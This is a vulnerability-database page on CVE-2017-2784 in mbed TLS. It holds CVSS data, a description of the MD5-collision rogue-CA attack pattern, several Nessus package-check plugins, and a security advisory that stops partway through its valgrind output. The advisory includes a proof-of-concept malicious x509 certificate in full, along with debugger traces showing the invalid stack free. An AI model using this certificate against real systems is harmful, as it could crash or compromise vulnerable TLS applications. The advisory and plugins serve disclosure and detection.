CVE-2017-2784 - Improper Certificate Validation vulnerability in ARM Mbed TLS

CVSS 6.8 - MEDIUM
Attack vector: NETWORK
Attack complexity: MEDIUM
Privileges required: NONE
Confidentiality impact: PARTIAL
Integrity impact: PARTIAL
Availability impact: PARTIAL
Tags: network, arm, CWE-295, nessus

Summary

An exploitable free of a stack pointer vulnerability exists in the x509 certificate parsing code of ARM mbed TLS before 1.3.19, 2.x before 2.1.7, and 2.4.x before 2.4.2. A specially crafted x509 certificate, when parsed by mbed TLS library, can cause an invalid free of a stack pointer leading to a potential remote code execution. In order to exploit this vulnerability, an attacker can act as either a client or a server on a network to deliver malicious x509 certificates to vulnerable applications.

Common Weakness Enumeration (CWE)

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Creating a Rogue Certificate Authority Certificate
    An attacker exploits a weakness in the MD5 hash algorithm (weak collision resistance) to generate a certificate signing request (CSR) that contains collision blocks in the "to be signed" part. The attacker specially crafts two different, but valid X.509 certificates that when hashed with the MD5 algorithm would yield the same value. The attacker then sends the CSR for one of the certificates to the Certification Authority which uses the MD5 hashing algorithm. That request is completely valid and the Certificate Authority issues an X.509 certificate to the attacker which is signed with its private key. An attacker then takes that signed blob and inserts it into another X.509 certificate that the attacker generated. Due to the MD5 collision, both certificates, though different, hash to the same value and so the signed blob works just as well in the second certificate. The net effect is that the attackers' second X.509 certificate, which the Certification Authority has never seen, is now signed and validated by that Certification Authority. To make the attack more interesting, the second certificate could be not just a regular certificate, but rather itself a signing certificate. Thus the attacker is able to start their own Certification Authority that is anchored in its root of trust in the legitimate Certification Authority that has signed the attackers' first X.509 certificate. If the original Certificate Authority was accepted by default by browsers, so will now the Certificate Authority set up by the attacker and of course any certificates that it signs. So the attacker is now able to generate any SSL certificates to impersonate any web server, and the user's browser will not issue any warning to the victim. This can be used to compromise HTTPS communications and other types of systems where PKI and X.509 certificates may be used (e.g., VPN, IPSec) .

Nessus

  • NASL family: SuSE Local Security Checks
    NASL id: OPENSUSE-2017-372.NASL
    description: This update to mbedtls 1.3.19 fixes security issues and bugs. The following vulnerability was fixed: CVE-2017-2784: A remote user could have used a specially crafted certificate to cause mbedtls to free a buffer allocated on the stack when verifying the validity of a public key with a secp224k1 curve, which could have allowed remote code execution on some platforms (boo#1029017). The following non-security changes are included: - Add checks to prevent signature forgeries for very large messages while using RSA through the PK module in 64-bit systems. - Fixed potential livelock during the parsing of a CRL in PEM format.
    last seen: 2020-06-05
    modified: 2017-03-23
    plugin id: 97905
    published: 2017-03-23
    reporter: This script is Copyright (C) 2017-2020 Tenable Network Security, Inc.
    source: https://www.tenable.com/plugins/nessus/97905
    title: openSUSE Security Update : mbedtls (openSUSE-2017-372)
    code:
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were
    # extracted from openSUSE Security Update openSUSE-2017-372.
    #
    # The text description of this plugin is (C) SUSE LLC.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(97905);
      script_version("3.4");
      script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04");
    
      script_cve_id("CVE-2017-2784");
    
      script_name(english:"openSUSE Security Update : mbedtls (openSUSE-2017-372)");
      script_summary(english:"Check for the openSUSE-2017-372 patch");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote openSUSE host is missing a security update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "This update to mbedtls 1.3.19 fixes security issues and bugs.
    
    The following vulnerability was fixed :
    
    CVE-2017-2784: A remote user could have used a specially crafted
    certificate to cause mbedtls to free a buffer allocated on the stack
    when verifying the validity of public key with a secp224k1 curve,
    which could have allowed remote code execution on some platforms
    (boo#1029017)
    
    The following non-security changes are included :
    
      - Add checks to prevent signature forgeries for very large
        messages while using RSA through the PK module in 64-bit
        systems.
    
      - Fixed potential livelock during the parsing of a CRL in
        PEM format"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1029017"
      );
      script_set_attribute(
        attribute:"solution", 
        value:"Update the affected mbedtls packages."
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libmbedtls9");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libmbedtls9-32bit");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libmbedtls9-debuginfo");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libmbedtls9-debuginfo-32bit");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:mbedtls-debugsource");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:mbedtls-devel");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:42.1");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:42.2");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2017/03/22");
      script_set_attribute(attribute:"plugin_publication_date", value:"2017/03/23");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2017-2020 Tenable Network Security, Inc.");
      script_family(english:"SuSE Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list", "Host/cpu");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("rpm.inc");
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    release = get_kb_item("Host/SuSE/release");
    if (isnull(release) || release =~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "openSUSE");
    if (release !~ "^(SUSE42\.1|SUSE42\.2)$") audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "42.1 / 42.2", release);
    if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    ourarch = get_kb_item("Host/cpu");
    if (!ourarch) audit(AUDIT_UNKNOWN_ARCH);
    if (ourarch !~ "^(i586|i686|x86_64)$") audit(AUDIT_ARCH_NOT, "i586 / i686 / x86_64", ourarch);
    
    flag = 0;
    
    if ( rpm_check(release:"SUSE42.1", reference:"libmbedtls9-1.3.19-15.1") ) flag++;
    if ( rpm_check(release:"SUSE42.1", reference:"libmbedtls9-debuginfo-1.3.19-15.1") ) flag++;
    if ( rpm_check(release:"SUSE42.1", reference:"mbedtls-debugsource-1.3.19-15.1") ) flag++;
    if ( rpm_check(release:"SUSE42.1", reference:"mbedtls-devel-1.3.19-15.1") ) flag++;
    if ( rpm_check(release:"SUSE42.1", cpu:"x86_64", reference:"libmbedtls9-32bit-1.3.19-15.1") ) flag++;
    if ( rpm_check(release:"SUSE42.1", cpu:"x86_64", reference:"libmbedtls9-debuginfo-32bit-1.3.19-15.1") ) flag++;
    if ( rpm_check(release:"SUSE42.2", reference:"libmbedtls9-1.3.19-15.1") ) flag++;
    if ( rpm_check(release:"SUSE42.2", reference:"libmbedtls9-debuginfo-1.3.19-15.1") ) flag++;
    if ( rpm_check(release:"SUSE42.2", reference:"mbedtls-debugsource-1.3.19-15.1") ) flag++;
    if ( rpm_check(release:"SUSE42.2", reference:"mbedtls-devel-1.3.19-15.1") ) flag++;
    if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libmbedtls9-32bit-1.3.19-15.1") ) flag++;
    if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libmbedtls9-debuginfo-32bit-1.3.19-15.1") ) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());
      else security_warning(0);
      exit(0);
    }
    else
    {
      tested = pkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "libmbedtls9 / libmbedtls9-32bit / libmbedtls9-debuginfo / etc");
    }
    
  • NASL family: Fedora Local Security Checks
    NASL id: FEDORA_2017-922652DD9C.NASL
    description: - Update to 2.4.2 - CVE-2017-2784. Release notes: https://tls.mbed.org/tech-updates/releases/mbedtls-2.4.2-2.1.7-and-1.3.19-released Security notes: https://tls.mbed.org/tech-updates/security-advisories/mbedtls-security-advisory-2017-01 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen: 2020-06-05
    modified: 2017-03-27
    plugin id: 97969
    published: 2017-03-27
    reporter: This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/97969
    title: Fedora 24 : mbedtls (2017-922652dd9c)
    code:
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from Fedora Security Advisory FEDORA-2017-922652dd9c.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(97969);
      script_version("3.5");
      script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04");
    
      script_cve_id("CVE-2017-2784");
      script_xref(name:"FEDORA", value:"2017-922652dd9c");
    
      script_name(english:"Fedora 24 : mbedtls (2017-922652dd9c)");
      script_summary(english:"Checks rpm output for the updated package.");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote Fedora host is missing a security update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "  - Update to 2.4.2
    
      - CVE-2017-2784
    
    Release notes:
    https://tls.mbed.org/tech-updates/releases/mbedtls-2.4.2-2.1.7-and-1.3
    .19-released Security notes:
    https://tls.mbed.org/tech-updates/security-advisories/mbedtls-security
    -advisory-2017-01
    
    Note that Tenable Network Security has extracted the preceding
    description block directly from the Fedora update system website.
    Tenable has attempted to automatically clean and format it as much as
    possible without introducing additional issues."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://bodhi.fedoraproject.org/updates/FEDORA-2017-922652dd9c"
      );
      # https://tls.mbed.org/tech-updates/security-advisories/mbedtls-security-advisory-2017-01
      script_set_attribute(
        attribute:"see_also",
        value:"http://www.nessus.org/u?a5dfef80"
      );
      script_set_attribute(
        attribute:"solution", 
        value:"Update the affected mbedtls package."
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:mbedtls");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:24");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2017/04/20");
      script_set_attribute(attribute:"patch_publication_date", value:"2017/03/24");
      script_set_attribute(attribute:"plugin_publication_date", value:"2017/03/27");
      script_set_attribute(attribute:"generated_plugin", value:"current");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Fedora Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("rpm.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    release = get_kb_item("Host/RedHat/release");
    if (isnull(release) || "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora");
    os_ver = pregmatch(pattern: "Fedora.*release ([0-9]+)", string:release);
    if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora");
    os_ver = os_ver[1];
    if (! preg(pattern:"^24([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 24", "Fedora " + os_ver);
    
    if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
    if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu);
    
    
    flag = 0;
    if (rpm_check(release:"FC24", reference:"mbedtls-2.4.2-1.fc24")) flag++;
    
    
    if (flag)
    {
      security_report_v4(
        port       : 0,
        severity   : SECURITY_WARNING,
        extra      : rpm_report_get()
      );
      exit(0);
    }
    else
    {
      tested = pkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "mbedtls");
    }
    
  • NASL family: Gentoo Local Security Checks
    NASL id: GENTOO_GLSA-201706-18.NASL
    description: The remote host is affected by the vulnerability described in GLSA-201706-18 (mbed TLS: Multiple vulnerabilities). Multiple vulnerabilities have been discovered in mbed TLS. Please review the CVE identifiers referenced below for details. Impact: A remote attacker could possibly execute arbitrary code with the privileges of the process, or cause a Denial of Service condition. Workaround: There is no known workaround at this time.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 100944
    published: 2017-06-21
    reporter: This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.
    source: https://www.tenable.com/plugins/nessus/100944
    title: GLSA-201706-18 : mbed TLS: Multiple vulnerabilities (SLOTH)
    code:
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were
    # extracted from Gentoo Linux Security Advisory GLSA 201706-18.
    #
    # The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.
    # and licensed under the Creative Commons - Attribution / Share Alike 
    # license. See http://creativecommons.org/licenses/by-sa/3.0/
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(100944);
      script_version("$Revision: 3.2 $");
      script_cvs_date("$Date: 2018/01/26 17:15:57 $");
    
      script_cve_id("CVE-2015-5291", "CVE-2015-7575", "CVE-2017-2784");
      script_xref(name:"GLSA", value:"201706-18");
    
      script_name(english:"GLSA-201706-18 : mbed TLS: Multiple vulnerabilities (SLOTH)");
      script_summary(english:"Checks for updated package(s) in /var/db/pkg");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:
    "The remote Gentoo host is missing one or more security-related
    patches."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "The remote host is affected by the vulnerability described in GLSA-201706-18
    (mbed TLS: Multiple vulnerabilities)
    
        Multiple vulnerabilities have been discovered in mbed TLS. Please review
          the CVE identifiers referenced below for details.
      
    Impact :
    
        A remote attacker could possibly execute arbitrary code with the
          privileges of the process, or cause a Denial of Service condition.
      
    Workaround :
    
        There is no known workaround at this time."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://security.gentoo.org/glsa/201706-18"
      );
      script_set_attribute(
        attribute:"solution", 
        value:
    "All mbed TLS users should upgrade to the latest version:
          # emerge --sync
          # emerge --ask --oneshot --verbose '>=net-libs/mbedtls-2.4.2'"
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:mbedtls");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:gentoo:linux");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2017/06/20");
      script_set_attribute(attribute:"in_the_news", value:"true");
      script_set_attribute(attribute:"plugin_publication_date", value:"2017/06/21");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.");
      script_family(english:"Gentoo Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/Gentoo/release", "Host/Gentoo/qpkg-list");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("qpkg.inc");
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/Gentoo/release")) audit(AUDIT_OS_NOT, "Gentoo");
    if (!get_kb_item("Host/Gentoo/qpkg-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    flag = 0;
    
    if (qpkg_check(package:"net-libs/mbedtls", unaffected:make_list("ge 2.4.2"), vulnerable:make_list("lt 2.4.2"))) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());
      else security_warning(0);
      exit(0);
    }
    else
    {
      tested = qpkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "mbed TLS");
    }
    
  • NASL family: Fedora Local Security Checks
    NASL id: FEDORA_2017-718154E0F2.NASL
    description: - Update to 2.4.2 - CVE-2017-2784. Release notes: https://tls.mbed.org/tech-updates/releases/mbedtls-2.4.2-2.1.7-and-1.3.19-released Security notes: https://tls.mbed.org/tech-updates/security-advisories/mbedtls-security-advisory-2017-01 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen: 2020-06-05
    modified: 2017-07-17
    plugin id: 101654
    published: 2017-07-17
    reporter: This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/101654
    title: Fedora 26 : mbedtls (2017-718154e0f2)
  • NASL family: Fedora Local Security Checks
    NASL id: FEDORA_2017-9ED1B89530.NASL
    description: - Update to 2.4.2 - CVE-2017-2784. Release notes: https://tls.mbed.org/tech-updates/releases/mbedtls-2.4.2-2.1.7-and-1.3.19-released Security notes: https://tls.mbed.org/tech-updates/security-advisories/mbedtls-security-advisory-2017-01 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen: 2020-06-05
    modified: 2017-03-27
    plugin id: 97970
    published: 2017-03-27
    reporter: This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/97970
    title: Fedora 25 : mbedtls (2017-9ed1b89530)

Seebug

bulletinFamily: exploit
description:

### Summary

An exploitable free of a stack pointer vulnerability exists in the x509 certificate parsing code of ARM mbedTLS 2.4.0. A specially crafted x509 certificate, when parsed by the mbedTLS library, can cause an invalid free of a stack pointer leading to a potential remote code execution. In order to exploit this vulnerability, an attacker can act as either a client or a server on a network to deliver malicious x509 certificates to vulnerable applications.

### Tested Versions

ARM mbedTLS 2.4.0.

### Product URLs

https://tls.mbed.org/

### CVSSv3 Score

8.1 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A

### CWE

CWE-590: Free of Memory not on the Heap

### Details

mbedTLS, previously known as PolarSSL, is an SSL and TLS implementation aimed at embedded devices and as such has few dependencies and a small footprint. It is especially popular as a way of providing transport layer security to embedded web servers such as GoAhead. The vulnerability exists in the part of the code responsible for handling elliptic curve cryptographic keys. It can be triggered by supplying a specially crafted x509 certificate to the target, which performs a series of checks on the certificate and the supplied public key.

In the provided proof-of-concept x509 certificate a curve of type `secp224k1` is specified:

```
openssl x509 -inform DER -text -in poc.der
Certificate:
    Data:
        Version: 1 (0x0)
        Serial Number: 11350574552211845977 (0x9d85576ad52cf359)
    Signature Algorithm: ecdsa-with-SHA256
        Issuer: C=AU, ST=Some-State, O=Internet Widgits Pty Ltd
        Validity
            Not Before: Jan 12 21:21:28 2017 GMT
            Not After : Jan 12 21:21:28 2018 GMT
        Subject: C=AU, ST=Some-State, O=Internet Widgits Pty Ltd
        Subject Public Key Info:
            Public Key Algorithm: id-ecPublicKey
Unable to load Public Key
    Signature Algorithm: ecdsa-with-SHA256
         30:3d:02:1d:00:d1:46:8a:7d:f8:d1:03:a7:a9:90:9a:2d:09:
         2f:e9:15:b5:5e:3a:14:ac:23:20:41:6e:0c:d0:c3:02:1c:10:
         1c:89:d4:0d:a3:04:0b:53:33:e4:fb:75:44:1d:a4:a3:0b:f9:
         d9:45:47:ff:99:d2:6f:ae:49
-----BEGIN CERTIFICATE-----
MIIBZzCCARUCCQCdhVdq1SzzWTAKBggqhkjOPQQDAjBFMQswCQYDVQQGEwJBVTET
MBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50ZXJuZXQgV2lkZ2l0cyBQ
dHkgTHRkMB4XDTE3MDExMjIxMjEyOFoXDTE4MDExMjIxMjEyOFowRTELMAkGA1UE
BhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoMGEludGVybmV0IFdp
ZGdpdHMgUHR5IEx0ZDBOMBAGByqGSM49AgEGBSuBBAAgAzoABAAAAADiAAAAAAAA
uzoT1DsyMzc4OTUyHwYDVR0QAQH/BAgwBgEB/wIBCjAiBgNVHQ4EGwRjb8DAMAoG
CCqGSM49BAMCA0AAMD0CHQDRRop9+NEDp6mQmi0JL+kVtV46FKwjIEFuDNDDAhwQ
HInUDaMEC1Mz5Pt1RB2kowv52UVH/5nSb65J
-----END CERTIFICATE-----
```

Notice that the `openssl x509` tool fails to parse the public key properly.

While parsing the certificate, and the public key specifically, the mbedTLS library will identify the curve in question as `secp224k1` while validating the public key and will invoke a number of elliptic curve arithmetic operations in order to verify the key, as can be seen from the context of the crashing application:

```
#0  0x00007ffff7a43428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54
#1  0x00007ffff7a4502a in __GI_abort () at abort.c:89
#2  0x00007ffff7a857ea in __libc_message (do_abort=do_abort@entry=2, fmt=fmt@entry=0x7ffff7b9e2e0 "*** Error in `%s': %s: 0x%s ***\n") at ../sysdeps/posix/libc_fatal.c:175
#3  0x00007ffff7a8de0a in malloc_printerr (ar_ptr=<optimized out>, ptr=<optimized out>, str=0x7ffff7b9e3f0 "double free or corruption (out)", action=3) at malloc.c:5004
#4  _int_free (av=<optimized out>, p=<optimized out>, have_lock=0) at malloc.c:3865
#5  0x00007ffff7a9198c in __GI___libc_free (mem=<optimized out>) at malloc.c:2966
#6  0x0000000000429785 in mbedtls_mpi_grow (X=0x7fffffffcc30, nblimbs=4) at bignum.c:130
#7  0x000000000042c08a in mbedtls_mpi_mul_mpi (X=0x7fffffffcc30, A=0x7fffffffcba0, B=0x7fffffffcc50) at bignum.c:1187
#8  0x00000000004422c7 in ecp_mod_koblitz (N=0x7fffffffcd40, Rp=0x6882e0 <Rp.3115>, p_limbs=4, adjust=1, shift=32, mask=4294967295) at ecp_curves.c:1247
#9  0x0000000000442546 in ecp_mod_p224k1 (N=0x7fffffffcd40) at ecp_curves.c:1304
#10 0x0000000000437534 in ecp_modp (N=0x7fffffffcd40, grp=0x68b6e0) at ecp.c:677
#11 0x000000000043baf1 in ecp_check_pubkey_sw (grp=0x68b6e0, pt=0x68b7f0) at ecp.c:1660
#12 0x000000000043bfef in mbedtls_ecp_check_pubkey (grp=0x68b6e0, pt=0x68b7f0) at ecp.c:1774
#13 0x000000000044b57f in pk_get_ecpubkey (p=0x7fffffffce78, end=0x68b53d "0\n\006\b*\206H\316=\004\003\002\003@", key=0x68b6e0) at pkparse.c:489
#14 0x000000000044b957 in mbedtls_pk_parse_subpubkey (p=0x7fffffffce78, end=0x68b53d "0\n\006\b*\206H\316=\004\003\002\003@", pk=0x7fffffffd568) at pkparse.c:623
#15 0x00000000004233c8 in x509_crt_parse_der_core (crt=0x7fffffffd420, buf=0x68c660 "0\202\001g0\202\001\025\002\t", buflen=363) at x509_crt.c:821
#16 0x000000000042378a in mbedtls_x509_crt_parse_der (chain=0x7fffffffd420, buf=0x68c660 "0\202\001g0\202\001\025\002\t", buflen=363) at x509_crt.c:952
#17 0x0000000000423879 in mbedtls_x509_crt_parse (chain=0x7fffffffd420, buf=0x68c660 "0\202\001g0\202\001\025\002\t", buflen=363) at x509_crt.c:995
#18 0x0000000000423a1f in mbedtls_x509_crt_parse_file (chain=0x7fffffffd420, path=0x7fffffffe85f "/ramdisk/poc.der") at x509_crt.c:1094
#19 0x0000000000401d66 in main (argc=3, argv=0x7fffffffe5e8) at x509/cert_app.c:299
```

In the above output, the application is crashing due to an invalid call to free inside the `mbedtls_mpi_grow` function:

```
int mbedtls_mpi_grow( mbedtls_mpi *X, size_t nblimbs )
{
    mbedtls_mpi_uint *p;
    ...
    if( X->n < nblimbs )
    {
        if( ( p = (mbedtls_mpi_uint*)mbedtls_calloc( nblimbs, ciL ) ) == NULL )
            return( MBEDTLS_ERR_MPI_ALLOC_FAILED );

        if( X->p != NULL )
        {
            memcpy( p, X->p, X->n * ciL );
            mbedtls_mpi_zeroize( X->p, X->n );
            mbedtls_free( X->p );                                   [1]
        }
        ....
    }
```

At [1] a wrapper to libc `free` is called with `X->p` as parameter. Going backwards through the call stack and code, it can be concluded that the final values of X and `X->p` are actually initialized in the `ecp_mod_koblitz` function:

```
static inline int ecp_mod_koblitz( mbedtls_mpi *N, mbedtls_mpi_uint *Rp, size_t p_limbs,
                                   size_t adjust, size_t shift, mbedtls_mpi_uint mask )
{
    int ret;
    size_t i;
    mbedtls_mpi M, R;
    mbedtls_mpi_uint Mp[P_KOBLITZ_MAX + P_KOBLITZ_R];               [1]
    ...
    /* Common setup for M */
    M.s = 1;
    M.p = Mp;                                                        [2]

    /* M = A1 */
    M.n = N->n - ( p_limbs - adjust );
    ...
    MBEDTLS_MPI_CHK( mbedtls_mpi_mul_mpi( &M, &M, &R ) );           [3]
    ...
```

At [1], we can observe the variable `Mp` being allocated on the stack. It is assigned to `M.p` at [2] and at [3] a call to `mbedtls_mpi_mul_mpi` is made, which eventually leads to the invalid free.

This can also be confirmed in the debugger:

```
Breakpoint 1, mbedtls_mpi_grow (X=0x7fffffffcc30, nblimbs=0x5) at bignum.c:118
118         if( nblimbs > MBEDTLS_MPI_MAX_LIMBS )
gdb-peda$ p X->p
$7 = (mbedtls_mpi_uint *) 0x7fffffffcc70
gdb-peda$ vmmap X->p
Warning: not found or cannot access procfs
gdb-peda$ vmmap 0x7fffffffcc70
Start              End                Perm      Name
0x00007ffffffde000 0x00007ffffffff000 rw-p      [stack]
gdb-peda$ bt
#0  mbedtls_mpi_grow (X=0x7fffffffcc30, nblimbs=0x5) at bignum.c:118
#1  0x000000000042c08a in mbedtls_mpi_mul_mpi (X=0x7fffffffcc30, A=0x7fffffffcba0, B=0x7fffffffcc50) at bignum.c:1187
#2  0x00000000004422c7 in ecp_mod_koblitz (N=0x7fffffffcd20, Rp=0x6882e0 <Rp.3115>, p_limbs=0x4, adjust=0x1, shift=0x20, mask=0xffffffff) at ecp_curves.c:1247
#3  0x0000000000442546 in ecp_mod_p224k1 (N=0x7fffffffcd20) at ecp_curves.c:1304
#4  0x0000000000437534 in ecp_modp (N=0x7fffffffcd20, grp=0x68b6e0) at ecp.c:677
#5  0x000000000043ba9b in ecp_check_pubkey_sw (grp=0x68b6e0, pt=0x68b7f0) at ecp.c:1659
#6  0x000000000043bfef in mbedtls_ecp_check_pubkey (grp=0x68b6e0, pt=0x68b7f0) at ecp.c:1774
#7  0x000000000044b57f in pk_get_ecpubkey (p=0x7fffffffce78, end=0x68b53d "0\n\006\b*\206H\316=\004\003\002\003@", key=0x68b6e0) at pkparse.c:489
#8  0x000000000044b957 in mbedtls_pk_parse_subpubkey (p=0x7fffffffce78, end=0x68b53d "0\n\006\b*\206H\316=\004\003\002\003@", pk=0x7fffffffd568) at pkparse.c:623
#9  0x00000000004233c8 in x509_crt_parse_der_core (crt=0x7fffffffd420, buf=0x68c660 "0\202\001g0\202\001\025\002\t", buflen=0x16b) at x509_crt.c:821
#10 0x000000000042378a in mbedtls_x509_crt_parse_der (chain=0x7fffffffd420, buf=0x68c660 "0\202\001g0\202\001\025\002\t", buflen=0x16b) at x509_crt.c:952
#11 0x0000000000423879 in mbedtls_x509_crt_parse (chain=0x7fffffffd420, buf=0x68c660 "0\202\001g0\202\001\025\002\t", buflen=0x16b) at x509_crt.c:995
#12 0x0000000000423a1f in mbedtls_x509_crt_parse_file (chain=0x7fffffffd420, path=0x7fffffffe85f "/ramdisk/poc.der") at x509_crt.c:1094
#13 0x0000000000401d66 in main (argc=0x3, argv=0x7fffffffe5e8) at x509/cert_app.c:299
#14 0x00007ffff7a2e830 in __libc_start_main (main=0x401722 <main>, argc=0x3, argv=0x7fffffffe5e8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe5d8) at ../csu/libc-start.c:291
#15 0x0000000000401519 in _start ()
gdb-peda$
```

A mitigating factor of this vulnerability is the fact that the area of memory pointed to by the pointer being freed is zeroed out just before the free, which does complicate exploitation, but since the library is designed and intended for embedded platforms which might not have modern heap exploitation mitigations in place, we believe it can result in remote code execution in certain environments. The vulnerability can be triggered with the supplied PoC file by opening it in the `cert_app` sample application provided with the library.

### Crash Information

Valgrind output:

```
valgrind ./cert_app mode=file filename=/ramdisk/poc.der
==28084== Memcheck, a memory error detector
==28084== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.
==28084== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info
